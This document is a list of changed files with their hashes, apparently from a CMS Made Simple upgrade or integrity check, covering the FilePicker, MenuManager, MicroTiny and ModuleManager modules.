CHANGED :: b450a4127e8650a62dcf825864be9e52 :: \modules\FilePicker\templates\edit_profile.tpl
CHANGED :: 0f34aecf89a0cc1daf5daae8c5cb05a9 :: \modules\FilePicker\templates\filepicker.tpl
CHANGED :: 5114b40fa2cbb20d1934a9f9f20e295b :: \modules\MenuManager\action.breadcrumbs.php
CHANGED :: d5e6d1f58a8d1d15f1652c08d534c979 :: \modules\MenuManager\action.default.php
CHANGED :: 6e8a2a74e8d5b457449d1bd8655fe366 :: \modules\MenuManager\action.items.php
CHANGED :: 01f32cabd4ae5b4ab5599aeb6806815a :: \modules\MenuManager\changelog.inc
CHANGED :: 42de5bb878e05e13f7cd671cf098f583 :: \modules\MenuManager\CSSMenu.js
CHANGED :: f431f4e7bbc5d9e9022f69f25b828b65 :: \modules\MenuManager\images\arrow.gif
CHANGED :: 446974e0a6e4d953817692bd407e1313 :: \modules\MenuManager\images\icon.gif
CHANGED :: fc56ddb2bdda1f420478fee93a32569e :: \modules\MenuManager\lang\en_US.php
CHANGED :: 2772cdd710883f684b9587d5b73a6db9 :: \modules\MenuManager\lang\ext\ar_AR.php
CHANGED :: 172fef8add1afd77f072f29ee6b38cb3 :: \modules\MenuManager\lang\ext\ca_ES.php
CHANGED :: 03e62514c224e925971a29cb34aa10e3 :: \modules\MenuManager\lang\ext\cs_CZ.php
CHANGED :: 8de8fa7be9b13ece8f14bfd3b17fd5bf :: \modules\MenuManager\lang\ext\da_DK.php
CHANGED :: 5f6cf02ece2670cc6328bd9c2fb9908f :: \modules\MenuManager\lang\ext\de_DE.php
CHANGED :: 4b80d4026c14bb63ba23ba25c89f3cdd :: \modules\MenuManager\lang\ext\el_GR.php
CHANGED :: bc674f6be6fea029d79ab9f823986b4f :: \modules\MenuManager\lang\ext\en_CY.php
CHANGED :: 2c62d777aabae003ea08ff41cd94d8f8 :: \modules\MenuManager\lang\ext\es_ES.php
CHANGED :: d9924a765f95940a6ab72b1cdab119b6 :: \modules\MenuManager\lang\ext\et_EE.php
CHANGED :: 3c0a68d0ac7a147060162c49eb173e0a :: \modules\MenuManager\lang\ext\fa_FA.php
CHANGED :: 3c0a68d0ac7a147060162c49eb173e0a :: \modules\MenuManager\lang\ext\fa_IR.php
CHANGED :: fe8f269e36c6472f471e8cb74c3e9ea0 :: \modules\MenuManager\lang\ext\fi_FI.php
CHANGED :: 0d6ece2ec25c8e261e82e82b77e8c3ed :: \modules\MenuManager\lang\ext\fr_FR.php
CHANGED :: b91537478e0896ce9c4e85b6a3b1c7ff :: \modules\MenuManager\lang\ext\hr_HR.php
CHANGED :: afa2c227f270ddb63300e107d3514595 :: \modules\MenuManager\lang\ext\hu_HU.php
CHANGED :: 7bd02be3f935ea2e8ab7ea452f1378aa :: \modules\MenuManager\lang\ext\it_IT.php
CHANGED :: 8d890c30b12d3182da1c1cbf5dcf6bca :: \modules\MenuManager\lang\ext\iw_IL.php
CHANGED :: 60f9a7fce02a85dfed5bfe76e9e5f9c7 :: \modules\MenuManager\lang\ext\ja_JP.php
CHANGED :: e5e6df0b0952f6158b4d57fe9a45d538 :: \modules\MenuManager\lang\ext\lt_LT.php
CHANGED :: 358a8d492cbb4c4814bc23d857f510d3 :: \modules\MenuManager\lang\ext\nb_NO.php
CHANGED :: d7de11a0891d43afebf365a48412468b :: \modules\MenuManager\lang\ext\nl_NL.php
CHANGED :: eb49c9d392a597a66a18a083237936bf :: \modules\MenuManager\lang\ext\pl_PL.php
CHANGED :: aabdb7999656e0a473c80e7cf157a531 :: \modules\MenuManager\lang\ext\pt_BR.php
CHANGED :: 3a9cf1aacab15c620dc9a9961e7f5db3 :: \modules\MenuManager\lang\ext\pt_PT.php
CHANGED :: 0e8b3d229d121622bb2eaefba0af4f45 :: \modules\MenuManager\lang\ext\rm_CH.php
CHANGED :: 231e3c5aae2b6ce10a98fa9799ff9223 :: \modules\MenuManager\lang\ext\ro_RO.php
CHANGED :: 756575042c1cd778e940340ea741b419 :: \modules\MenuManager\lang\ext\ru_RU.php
CHANGED :: 215fbc68f7f813c6ccc1db69149ff42d :: \modules\MenuManager\lang\ext\sk_SK.php
CHANGED :: 7362765f11aa0b63f1168b0041191351 :: \modules\MenuManager\lang\ext\sl_SI.php
CHANGED :: 280f5b228806e0577329751fe26607f5 :: \modules\MenuManager\lang\ext\sr_YU.php
CHANGED :: ec3e58c00b7d8f1c57e94892b273d598 :: \modules\MenuManager\lang\ext\sv_SE.php
CHANGED :: 6e43ef330d3610921fb93a91e99b67f7 :: \modules\MenuManager\lang\ext\tr_TR.php
CHANGED :: 33bb15ba8a7e48806af58cc77d493906 :: \modules\MenuManager\lang\ext\zh_TW.php
CHANGED :: beda145249d4ad77e44d6b7baab9d957 :: \modules\MenuManager\MenuManager.module.php
CHANGED :: b1acf21d685b8197111e13c32dc2e3a1 :: \modules\MenuManager\method.install.php
CHANGED :: 203b39fb203c1ca3a1d22ccebfc67551 :: \modules\MenuManager\method.uninstall.php
CHANGED :: bae758be9354062096adc1555a28e914 :: \modules\MenuManager\method.upgrade.php
CHANGED :: 0f1792603f17adbce23e62fba3d8d599 :: \modules\MenuManager\templates\accessible_cssmenu.tpl
CHANGED :: 700191753a7ecbdcff876fbe50485e54 :: \modules\MenuManager\templates\accessible_simple_navigation.tpl
CHANGED :: 7230cf3ed38961925e45c2fbdc14864c :: \modules\MenuManager\templates\breadcrumbs.tpl
CHANGED :: 58bb51accfe0bf11a68e92b29a90d2ad :: \modules\MenuManager\templates\cssmenu.tpl
CHANGED :: 26527ab05f6f6e4937a4aa744bfadce0 :: \modules\MenuManager\templates\cssmenu_ulshadow.tpl
CHANGED :: 9b6a2c19f497f9908d5042776cce2528 :: \modules\MenuManager\templates\dbtpllist.tpl
CHANGED :: 6576c0c4adbb79014328f6783639778e :: \modules\MenuManager\templates\edittemplate.tpl
CHANGED :: 5430fb5de31a58d14f782795442812fe :: \modules\MenuManager\templates\filetpllist.tpl
CHANGED :: 403ded08fa80e810b05022d426deb0cc :: \modules\MenuManager\templates\importtemplate.tpl
CHANGED :: 900497f76843e49ed3a03e58a58b5b62 :: \modules\MenuManager\templates\minimal_menu.tpl
CHANGED :: 4ad796356345d19141716d9aad8efe66 :: \modules\MenuManager\templates\Simplex_Navigation.tpl
CHANGED :: 912e41993d605d9935000bb170079e1b :: \modules\MenuManager\templates\simple_navigation.tpl
CHANGED :: 2c030267eea7af05a27ac7f351365d65 :: \modules\MicroTiny\action.admin_editprofile.php
CHANGED :: c99efd309b5aec682822d2c34aeba7b2 :: \modules\MicroTiny\action.ajax_getpages.php
CHANGED :: 6d408603adf67bb71681babdfa986956 :: \modules\MicroTiny\action.default.php
CHANGED :: cf1687136c2077fafaaa3603426b83be :: \modules\MicroTiny\action.defaultadmin.php
CHANGED :: 28df0f6a74423338ae9394bdc2458af3 :: \modules\MicroTiny\action.filepicker.php
CHANGED :: 60410d6039c9433bea72620c71972f52 :: \modules\MicroTiny\action.savesettings.php
CHANGED :: 2127e224b416298f2213813fb86e26ac :: \modules\MicroTiny\function.admin_example.php
CHANGED :: 32331b15156f4d8231d0468ac8020205 :: \modules\MicroTiny\function.admin_settings.php
CHANGED :: 9b6f3d793b977ab14c002063ac2c3063 :: \modules\MicroTiny\images\icon.png
CHANGED :: e05f0dcb77d76dcc09fda4b3d697d5ba :: \modules\MicroTiny\lang\en_US.php
CHANGED :: 06cc998c84d0c310c24b129d4c9d64a8 :: \modules\MicroTiny\lang\ext\ar_AR.php
CHANGED :: a293e3da25ad5d2d6deaff8a7685750f :: \modules\MicroTiny\lang\ext\cs_CZ.php
CHANGED :: e8377b70f9944a7a1d33c8d02b447e6e :: \modules\MicroTiny\lang\ext\da_DK.php
CHANGED :: 29012414f473a0f40f03ec631d938e43 :: \modules\MicroTiny\lang\ext\de_DE.php
CHANGED :: 40e09f9b222d321a1e1a40a56eea725d :: \modules\MicroTiny\lang\ext\en_CY.php
CHANGED :: 93a8143dd1f400fdf0ecf708f275c158 :: \modules\MicroTiny\lang\ext\es_ES.php
CHANGED :: 3ba17c7991a754a0fbfb1d9b2b99e905 :: \modules\MicroTiny\lang\ext\et_EE.php
CHANGED :: b1b92ed720c3c49af0f8cd7161f4ab96 :: \modules\MicroTiny\lang\ext\fa_FA.php
CHANGED :: b1b92ed720c3c49af0f8cd7161f4ab96 :: \modules\MicroTiny\lang\ext\fa_IR.php
CHANGED :: c0bbf98e24501b10bfd570c5794822d0 :: \modules\MicroTiny\lang\ext\fi_FI.php
CHANGED :: da77548ea9b404c913ba8efbe563f5f3 :: \modules\MicroTiny\lang\ext\fr_FR.php
CHANGED :: 2103e53f75acc5abf60d7cf89db90e7f :: \modules\MicroTiny\lang\ext\hr_HR.php
CHANGED :: db41c478e5cc441a5df2c08c40aade37 :: \modules\MicroTiny\lang\ext\hu_HU.php
CHANGED :: 136bcb80adf97660d10340c78c6b3fad :: \modules\MicroTiny\lang\ext\it_IT.php
CHANGED :: 13ec84178f684fd2b12b2ec7606a054b :: \modules\MicroTiny\lang\ext\iw_IL.php
CHANGED :: 4bcc79854c3cfeb8150980ae4782ac0e :: \modules\MicroTiny\lang\ext\ja_JP.php
CHANGED :: c7069e2dd637eb729e38ab99199e1654 :: \modules\MicroTiny\lang\ext\lt_LT.php
CHANGED :: 2e516e6151258e491c9c3a714611eef7 :: \modules\MicroTiny\lang\ext\nb_NO.php
CHANGED :: e92c6f3a8bccf000856c0d94e245048e :: \modules\MicroTiny\lang\ext\nl_NL.php
CHANGED :: 113cccde03b6aa26500b7c8f22fd8f72 :: \modules\MicroTiny\lang\ext\pl_PL.php
CHANGED :: 7403c3bc1aa1f772e37f80d17d79674d :: \modules\MicroTiny\lang\ext\pt_PT.php
CHANGED :: 809d2f94cc2c40843e52916cfcbc083c :: \modules\MicroTiny\lang\ext\ro_RO.php
CHANGED :: c66cced7c30ec864541550bd40115484 :: \modules\MicroTiny\lang\ext\ru_RU.php
CHANGED :: c2c1b6aea15e1f017950577e1ca0525a :: \modules\MicroTiny\lang\ext\sk_SK.php
CHANGED :: 590aff2caa34bc968f00d054161e77a9 :: \modules\MicroTiny\lang\ext\sl_SI.php
CHANGED :: 6db8bb6d1bd6a3149b525fee8a256b58 :: \modules\MicroTiny\lang\ext\sr_YU.php
CHANGED :: 7a9d8dad6e17181defff38b64a43757d :: \modules\MicroTiny\lang\ext\sv_SE.php
CHANGED :: d781800c9014c01a3359b0b0c84de629 :: \modules\MicroTiny\lang\ext\tr_TR.php
CHANGED :: 91a329dd6d97c3f3f4e948a65fb19689 :: \modules\MicroTiny\lang\ext\vi_VN.php
CHANGED :: 6a5fcfc9a3de513a00d5e396a6a59736 :: \modules\MicroTiny\lang\ext\zh_TW.php
CHANGED :: c48ee5bcc3a15b2de9b64971dbc799b1 :: \modules\MicroTiny\lib\class.microtiny_profile.php
CHANGED :: fe5cfb2aca4da3ecc4893ccb7eddc576 :: \modules\MicroTiny\lib\class.microtiny_utils.php
CHANGED :: f427fa3178da019bdbbba90fea0265f9 :: \modules\MicroTiny\lib\css\filepicker.css
CHANGED :: 5bce07b13daa8339b33e2c803c7b6f03 :: \modules\MicroTiny\lib\css\filepicker.min.css
CHANGED :: 328a8ec09b52f838bb0fcc39a111b02d :: \modules\MicroTiny\lib\fonts\cmsms-filepicker.eot
CHANGED :: a5aca27afe0e06d4a6554d5c213857fc :: \modules\MicroTiny\lib\fonts\cmsms-filepicker.svg
CHANGED :: 73d845f300f8b6bcbfcb51664de69a2f :: \modules\MicroTiny\lib\fonts\cmsms-filepicker.ttf
CHANGED :: fbb37304128e1a92b1ad0af0986dab96 :: \modules\MicroTiny\lib\fonts\cmsms-filepicker.woff
CHANGED :: 8ef6940626da4b5977ffa5483b0b2558 :: \modules\MicroTiny\lib\images\cmsmslink.gif
CHANGED :: 225471a77db57ec491fb3112a7f6cfb2 :: \modules\MicroTiny\lib\images\dir.gif
CHANGED :: 04f58536bee95751fcae77f6832b7ae0 :: \modules\MicroTiny\lib\images\mailto.gif
CHANGED :: 7d6fd91e8b6b29fb0ddf7bb0189bc8d0 :: \modules\MicroTiny\lib\js\tinymce\langs\af_ZA.js
CHANGED :: cf104dfa71a982da0cfb146afea07d92 :: \modules\MicroTiny\lib\js\tinymce\langs\ar.js
CHANGED :: 887c4f5dde886dda1372be40bdbec825 :: \modules\MicroTiny\lib\js\tinymce\langs\az.js
CHANGED :: 7f084cbc5084dfb29fd1cda5ca13a109 :: \modules\MicroTiny\lib\js\tinymce\langs\be.js
CHANGED :: 78cdc17a7590dfb7cad448ad872e5397 :: \modules\MicroTiny\lib\js\tinymce\langs\bg_BG.js
CHANGED :: 7ab3a3559ddb9534c2659ca4a0f30264 :: \modules\MicroTiny\lib\js\tinymce\langs\ca.js
CHANGED :: 6e8ce66180fd4de34d66901d367390e3 :: \modules\MicroTiny\lib\js\tinymce\langs\cs.js
CHANGED :: 2a3cbf15a974aac2d8fdad3965f0643b :: \modules\MicroTiny\lib\js\tinymce\langs\cs_CZ.js
CHANGED :: 5470471e6d7c7d96309d80cb4acd13f8 :: \modules\MicroTiny\lib\js\tinymce\langs\cy.js
CHANGED :: e60d1e27d974bbd6cbd892c8620a0be2 :: \modules\MicroTiny\lib\js\tinymce\langs\da.js
CHANGED :: cb20c75d15fc8eb3461f7ae533e8e679 :: \modules\MicroTiny\lib\js\tinymce\langs\de.js
CHANGED :: e4e9de396bf32cfd1b3cbb7ed18c782a :: \modules\MicroTiny\lib\js\tinymce\langs\de_AT.js
CHANGED :: 786dc9a6dc212cccfd183d245620bcd8 :: \modules\MicroTiny\lib\js\tinymce\langs\dv.js
CHANGED :: 6f2edcc18215e8fb271b8c4bc0875c4f :: \modules\MicroTiny\lib\js\tinymce\langs\el.js
CHANGED :: 5638eecb3cb98b7884d2e4b1f6a34dfd :: \modules\MicroTiny\lib\js\tinymce\langs\en_CA.js
CHANGED :: 80a29f6251a39d6f0af75df827633a13 :: \modules\MicroTiny\lib\js\tinymce\langs\en_GB.js
CHANGED :: 957851defb7f96c01ddc9d555cadad83 :: \modules\MicroTiny\lib\js\tinymce\langs\eo.js
CHANGED :: 16224030bea49f7616b7086096f571b4 :: \modules\MicroTiny\lib\js\tinymce\langs\es.js
CHANGED :: b9809b10bb5e752be07fc9613477f168 :: \modules\MicroTiny\lib\js\tinymce\langs\es_MX.js
CHANGED :: 85af19ec5217bb05660f72b2e972cb8e :: \modules\MicroTiny\lib\js\tinymce\langs\et.js
CHANGED :: 787b9cedfebfa647f6381e35bb991c5a :: \modules\MicroTiny\lib\js\tinymce\langs\fa_IR.js
CHANGED :: 5226c4f8d61b6cde324d47286e27b56f :: \modules\MicroTiny\lib\js\tinymce\langs\fi.js
CHANGED :: 9806e6f77eca03c98f197878189e1a8d :: \modules\MicroTiny\lib\js\tinymce\langs\fo.js
CHANGED :: 381bab1a4ee4a7ec1f7f0087b3b3f58c :: \modules\MicroTiny\lib\js\tinymce\langs\fr_CH.js
CHANGED :: 012df6743c3a92a614da7fe397c8ce0b :: \modules\MicroTiny\lib\js\tinymce\langs\fr_FR.js
CHANGED :: 44e27a1e07a8a0189da58537a7a76cf9 :: \modules\MicroTiny\lib\js\tinymce\langs\ga.js
CHANGED :: cf5f46b546b7bd63ef37f8db31516e6b :: \modules\MicroTiny\lib\js\tinymce\langs\gd.js
CHANGED :: 4081313f8a17fa27d77f03915de93ab9 :: \modules\MicroTiny\lib\js\tinymce\langs\he_IL.js
CHANGED :: db4969bf2bc0347da25e5d027d27e122 :: \modules\MicroTiny\lib\js\tinymce\langs\hi_IN.js
CHANGED :: 1999f5abedb0516317e164429b3e2d2b :: \modules\MicroTiny\lib\js\tinymce\langs\hr.js
CHANGED :: eba124fa7b31f1b5636bb2e3785682bb :: \modules\MicroTiny\lib\js\tinymce\langs\hu_HU.js
CHANGED :: 2a85b5d238595fc3a100276c8f9ba7fb :: \modules\MicroTiny\lib\js\tinymce\langs\hy.js
CHANGED :: 333017082e0002999100c5150dfbd7d2 :: \modules\MicroTiny\lib\js\tinymce\langs\id.js
CHANGED :: 51c2c22110fa6bea65c9e3d5df12e974 :: \modules\MicroTiny\lib\js\tinymce\langs\is_IS.js
CHANGED :: 8ee9d3c0ca1c4dcba0b7fb53366bfad7 :: \modules\MicroTiny\lib\js\tinymce\langs\it.js
CHANGED :: 43ff4b17e9d39a5a53b70424530c1e91 :: \modules\MicroTiny\lib\js\tinymce\langs\ja.js
CHANGED :: 4bf62f435382235da0a330c78789f34b :: \modules\MicroTiny\lib\js\tinymce\langs\kab.js
CHANGED :: da2bc7bb054ce1862b68010fb1a3d331 :: \modules\MicroTiny\lib\js\tinymce\langs\ka_GE.js
CHANGED :: 25260b26eeb9e11c5690ac3d046bbfd9 :: \modules\MicroTiny\lib\js\tinymce\langs\kk.js
CHANGED :: 98790418ee09d0e7f9427f66d7d774a1 :: \modules\MicroTiny\lib\js\tinymce\langs\km_KH.js
CHANGED :: 8532508e77fa39d82b9d5271670e2eba :: \modules\MicroTiny\lib\js\tinymce\langs\ko_KR.js
CHANGED :: 3662ecde53151115cf0309e930bd448a :: \modules\MicroTiny\lib\js\tinymce\langs\lt.js
CHANGED :: 4c05f120046fef83c0c3b0c3e1c09c58 :: \modules\MicroTiny\lib\js\tinymce\langs\lv.js
CHANGED :: 17f7b3d5a07202b3dbb6bc7bef236bf3 :: \modules\MicroTiny\lib\js\tinymce\langs\mk_MK.js
CHANGED :: 6d0e8881761e58378c2852abcc983e80 :: \modules\MicroTiny\lib\js\tinymce\langs\nb_NO.js
CHANGED :: f716db1fe176c2ddf1e2ecb33d1274d2 :: \modules\MicroTiny\lib\js\tinymce\langs\nl.js
CHANGED :: 37f5a33735424c00c8b408702b1bdb0a :: \modules\MicroTiny\lib\js\tinymce\langs\oc.js
CHANGED :: d200685888406dc0e23c33824fdf0a0c :: \modules\MicroTiny\lib\js\tinymce\langs\pl.js
CHANGED :: 397857f1d4ff74beb9b79568d7d8aa54 :: \modules\MicroTiny\lib\js\tinymce\langs\pt_BR.js
CHANGED :: 0ce2d2d804458d4990e9b3cc513b8858 :: \modules\MicroTiny\lib\js\tinymce\langs\pt_PT.js
CHANGED :: d9f83500e65259dd54ab5ca961fe5281 :: \modules\MicroTiny\lib\js\tinymce\langs\ro.js
CHANGED :: 4ed9c8f0f3c69496ff7578219e02992d :: \modules\MicroTiny\lib\js\tinymce\langs\ru.js
CHANGED :: bab974dac90d32e890ea22e7018cde38 :: \modules\MicroTiny\lib\js\tinymce\langs\sk.js
CHANGED :: 3fd93508b8dc19cd19a6b57540b9d8c8 :: \modules\MicroTiny\lib\js\tinymce\langs\sl_SI.js
CHANGED :: 74a060deeb7318a1c847d2eea81de79a :: \modules\MicroTiny\lib\js\tinymce\langs\sr.js
CHANGED :: 5c8ab6cdd8af2f519b96156d49d8cb36 :: \modules\MicroTiny\lib\js\tinymce\langs\sv_SE.js
CHANGED :: 3fde13492a74b85f12bb3e6c4be26f1d :: \modules\MicroTiny\lib\js\tinymce\langs\ta.js
CHANGED :: d0c26108048e45429077997dec4dfb0d :: \modules\MicroTiny\lib\js\tinymce\langs\ta_IN.js
CHANGED :: a1e94df8bee3f9f7b03a60cb9de6abf1 :: \modules\MicroTiny\lib\js\tinymce\langs\th_TH.js
CHANGED :: 4b87331e96e08a7f1f70f8497a321a65 :: \modules\MicroTiny\lib\js\tinymce\langs\tr.js
CHANGED :: 300ae0f37becfcc7a290173dbf46f18e :: \modules\MicroTiny\lib\js\tinymce\langs\tr_TR.js
CHANGED :: cce26fbc28aa2e0426b1afe3a9976345 :: \modules\MicroTiny\lib\js\tinymce\langs\ug.js
CHANGED :: 3c0326d0c41666e6357409cc79feb138 :: \modules\MicroTiny\lib\js\tinymce\langs\uk.js
CHANGED :: 1006ff238e940ab7e4b2faab1d51ac6e :: \modules\MicroTiny\lib\js\tinymce\langs\uk_UA.js
CHANGED :: 89db7c756023b0767ea3de96ed906ae4 :: \modules\MicroTiny\lib\js\tinymce\langs\vi_VN.js
CHANGED :: df2e8073e7129a4c9c09bfc7deee5055 :: \modules\MicroTiny\lib\js\tinymce\langs\zh_CN.GB2312.js
CHANGED :: ed5c27c7111641af6553105bfa369440 :: \modules\MicroTiny\lib\js\tinymce\langs\zh_CN.js
CHANGED :: 65b8ba487ae762604056c894b0347f16 :: \modules\MicroTiny\lib\js\tinymce\langs\zh_TW.js
CHANGED :: 6f9589e0c8df783acd1760d203bafffa :: \modules\MicroTiny\lib\js\tinymce\license.txt
CHANGED :: 671e4981e4ce072dc7d4189437cdea1c :: \modules\MicroTiny\lib\js\tinymce\plugins\cmsms_filepicker\plugin.min.js
CHANGED :: be193992617bda8e46e95b6eee2f5f4f :: \modules\MicroTiny\lib\js\tinymce\plugins\cmsms_linker\plugin.js
CHANGED :: b22fe62c99c3b16def08de033322b06c :: \modules\MicroTiny\lib\js\tinymce\plugins\cmsms_linker\plugin.min.js
CHANGED :: 0de543e14079b2ccb1cb3f25b8065e76 :: \modules\MicroTiny\lib\js\tinymce\plugins\mailto\plugin.min.js
CHANGED :: 84ffd2b813696cd39647edb83440ba4c :: \modules\MicroTiny\lib\js\tinymce\plugins\table\plugin.min.js
CHANGED :: f1277d98c26cc9b26bc1c17cdb06bcca :: \modules\MicroTiny\lib\js\tinymce\skins\lightgray\content.inline.min.css
CHANGED :: 09a8e927e49e3515d737e6846b5948af :: \modules\MicroTiny\lib\js\tinymce\skins\lightgray\content.min.css
CHANGED :: 12d26c285b71d790f4b0c94423ef1f99 :: \modules\MicroTiny\lib\js\tinymce\skins\lightgray\fonts\tinymce-small.eot
CHANGED :: a2a1f732cc34764c684ed521c6f3327c :: \modules\MicroTiny\lib\js\tinymce\skins\lightgray\fonts\tinymce-small.svg
CHANGED :: 28806940c647cf671bebf4ae0630e570 :: \modules\MicroTiny\lib\js\tinymce\skins\lightgray\fonts\tinymce-small.ttf
CHANGED :: 7e0c88f02dcaf2f78c90b4dc7827b709 :: \modules\MicroTiny\lib\js\tinymce\skins\lightgray\fonts\tinymce-small.woff
CHANGED :: 6196b6eb25b52ac8bbe4a94e6da8ae27 :: \modules\MicroTiny\lib\js\tinymce\skins\lightgray\fonts\tinymce.eot
CHANGED :: 7262d908f15434ec7c3ae2126bc87350 :: \modules\MicroTiny\lib\js\tinymce\skins\lightgray\fonts\tinymce.svg
CHANGED :: aefbfcb02f143d3b3d3e47ff3de8efb1 :: \modules\MicroTiny\lib\js\tinymce\skins\lightgray\fonts\tinymce.ttf
CHANGED :: a7a41ea9358b658ec53e9d042334c1a8 :: \modules\MicroTiny\lib\js\tinymce\skins\lightgray\fonts\tinymce.woff
CHANGED :: abd3613571800fdcc891181d5f34f840 :: \modules\MicroTiny\lib\js\tinymce\skins\lightgray\img\anchor.gif
CHANGED :: 394bafc3cc4dfb3a0ee48c1f54669539 :: \modules\MicroTiny\lib\js\tinymce\skins\lightgray\img\loader.gif
CHANGED :: f3726450d7457d750a2f4d9441c7ee20 :: \modules\MicroTiny\lib\js\tinymce\skins\lightgray\img\object.gif
CHANGED :: 12bf9e19374920de3146a64775f46a5e :: \modules\MicroTiny\lib\js\tinymce\skins\lightgray\img\trans.gif
CHANGED :: b7da29baf0549e017bdeaa2d836db37b :: \modules\MicroTiny\lib\js\tinymce\skins\lightgray\skin.min.css
CHANGED :: 35e769209cbe82809585ccc3f28f73a1 :: \modules\MicroTiny\lib\js\tinymce\tinymce.min.js
CHANGED :: d27240871a9abb4954cdbe0b15d54dc6 :: \modules\MicroTiny\method.install.php
CHANGED :: b745ad287d0ad359d8b7b9fedc551f49 :: \modules\MicroTiny\method.uninstall.php
CHANGED :: c1488f8a0af04a653f62c4b42f2df4ba :: \modules\MicroTiny\method.upgrade.php
CHANGED :: 5d9953aecf1906255fb92ce2c87ac2a8 :: \modules\MicroTiny\MicroTiny.module.php
CHANGED :: 0a9daa05b8bf1b34a43986e8c174c47b :: \modules\MicroTiny\templates\admin_editprofile.tpl
CHANGED :: f545826ccb6ec731fa8559b15017a4cb :: \modules\MicroTiny\templates\admin_example.tpl
CHANGED :: 26c47893bcd5ad79af14ff7286f7b4e9 :: \modules\MicroTiny\templates\changelog.tpl
CHANGED :: 09e8bf799864071fc5ca7abadef98945 :: \modules\MicroTiny\templates\filepicker.tpl
CHANGED :: bae02d9bf0fd8ec1865c2afc654b4206 :: \modules\MicroTiny\templates\settings.tpl
CHANGED :: 6eaa795d1fedbf1d2850f2047a095c5d :: \modules\MicroTiny\templates\tinymce_config.js
CHANGED :: 63107b8b5f47bc82d7477e46a07d8035 :: \modules\ModuleManager\action.defaultadmin.php
CHANGED :: df4ceea1d00f03961120d1ee2ffacc40 :: \modules\ModuleManager\action.installmodule.php
CHANGED :: 34c4da45550f473301f91979007dd307 :: \modules\ModuleManager\action.local_about.php
CHANGED :: e4edd7d35519bb53addfb69155cc490c :: \modules\ModuleManager\action.local_active.php
CHANGED :: 2265923e9be17723188dccd4b18cb427 :: \modules\ModuleManager\action.local_chmod.php
CHANGED :: ce754b978031f450e2f11ef5a68584e8 :: \modules\ModuleManager\action.local_export.php
CHANGED :: 088572cb74b8f006b18ff38b80c17ad3 :: \modules\ModuleManager\action.local_help.php
CHANGED :: 9a1ffb56dd7fbe4fd95ccce4d4180701 :: \modules\ModuleManager\action.local_import.php
CHANGED :: 7d972fea3421e4b42c5c3f3832fd4f06 :: \modules\ModuleManager\action.local_install.php
CHANGED :: cfde4d99b3eddc62287b099c331f018a :: \modules\ModuleManager\action.local_missingdeps.php
CHANGED :: dfdcff4d3ef7c2be5c5c1d5910bbc9fb :: \modules\ModuleManager\action.local_remove.php
CHANGED :: da6e8bd93264a229ed1ee0e9904334be :: \modules\ModuleManager\action.local_uninstall.php
CHANGED :: 6809c8098aa122cde5335a1a3289057e :: \modules\ModuleManager\action.local_upgrade.php
CHANGED :: 3f9f6e84cabfd7ba09fde902f6ff6912 :: \modules\ModuleManager\action.moduleabout.php
CHANGED :: e6fa242678168acc09da8715d6d3b13e :: \modules\ModuleManager\action.moduledepends.php
CHANGED :: 766ef0ecb58b9925cec4cba8cbe3b391 :: \modules\ModuleManager\action.modulehelp.php
CHANGED :: 656c5aaf834be74460c167c88f13ea82 :: \modules\ModuleManager\action.modulelist.php
CHANGED :: 3115435a1d2e3f3f01a0f32613b433fe :: \modules\ModuleManager\action.setprefs.php
CHANGED :: 2aedcfa8194c0a012526fef446157792 :: \modules\ModuleManager\changelog.inc
CHANGED :: d32239bcb673463ab874e80d47fae504 :: \modules\ModuleManager\docs\COPYING
CHANGED :: d10c1569833d62db136f52a70602c29c :: \modules\ModuleManager\function.admin_installed.php
CHANGED :: abbab606bafa0832722e6445c91010c0 :: \modules\ModuleManager\function.admin_modules_tab.php
CHANGED :: dce3dc4b3dd800f214f961ff1b9d1a12 :: \modules\ModuleManager\function.admin_prefs_tab.php
CHANGED :: b09c8dc9551e87b2b43f20b8e3be78e9 :: \modules\ModuleManager\function.newversionstab.php
CHANGED :: 12735deec8031e52b6d7f63bd0571827 :: \modules\ModuleManager\function.search.php
CHANGED :: a7a5a0e67a8271f24234cf3f2af0ef6b :: \modules\ModuleManager\images\deprecate.png
CHANGED :: e18f3ed8a494f0b318c2ed4e620117bb :: \modules\ModuleManager\images\error.png
CHANGED :: a04851160e8d8b6c55a52d333ea8b9e0 :: \modules\ModuleManager\images\icon.gif
CHANGED :: 679cf10fd21acbd683d86ed9156193da :: \modules\ModuleManager\images\icon.png
CHANGED :: 87afddae914f0c689210edd4c049c1a8 :: \modules\ModuleManager\images\new.png
CHANGED :: 260df106d5171bf2864ba145f500bce3 :: \modules\ModuleManager\images\puzzle.png
CHANGED :: 7ac947a99f6bed295e0a93658b9fd066 :: \modules\ModuleManager\images\star.png
CHANGED :: bbe8c05ca112221299bf23724f87eade :: \modules\ModuleManager\images\system.png
CHANGED :: 8b08dfe8074fb55a7589385f6b030d10 :: \modules\ModuleManager\images\warn.png
CHANGED :: 769fc3835044a1ed003fa67215335666 :: \modules\ModuleManager\images\xml_rss.gif
CHANGED :: dc802cd36ace419e73e62039cba8fcc8 :: \modules\ModuleManager\lang\en_US.php
CHANGED :: 7e024c73a30867490c98d42e9e6188c9 :: \modules\ModuleManager\lang\ext\ar_AR.php
CHANGED :: a1bb83977ab4752ef83ce6148fa310e7 :: \modules\ModuleManager\lang\ext\ca_ES.php
CHANGED :: 7cf9819f6ee1a9db8b8b354ee69f23ea :: \modules\ModuleManager\lang\ext\cs_CZ.php
CHANGED :: d30c4410c9ec45f49da8c88a8672434d :: \modules\ModuleManager\lang\ext\da_DK.php
CHANGED :: 89299dc102b82ef2b68af17ba2ae77af :: \modules\ModuleManager\lang\ext\de_DE.php
CHANGED :: f787e0dc1b4c82631bb4f9cd56455e02 :: \modules\ModuleManager\lang\ext\el_GR.php
CHANGED :: 75473db966c5a7d0de4768b1307bda5a :: \modules\ModuleManager\lang\ext\en_CY.php
CHANGED :: fcf1758181ed9334896ae94a9d9c8158 :: \modules\ModuleManager\lang\ext\es_ES.php
CHANGED :: 0d8c00e9b8995efb4e09af61e53655c9 :: \modules\ModuleManager\lang\ext\et_EE.php
CHANGED :: 5722336ff700f43e1929f64d03855c6b :: \modules\ModuleManager\lang\ext\fa_FA.php
CHANGED :: 5722336ff700f43e1929f64d03855c6b :: \modules\ModuleManager\lang\ext\fa_IR.php
CHANGED :: 5f5b126945135ca26eb5e84fa51310f4 :: \modules\ModuleManager\lang\ext\fi_FI.php
CHANGED :: 92d1f638fe85048dea3abbccfb4ebc77 :: \modules\ModuleManager\lang\ext\fr_FR.php
CHANGED :: b96fafd136ce035a073a3346a5b4fa43 :: \modules\ModuleManager\lang\ext\hr_HR.php
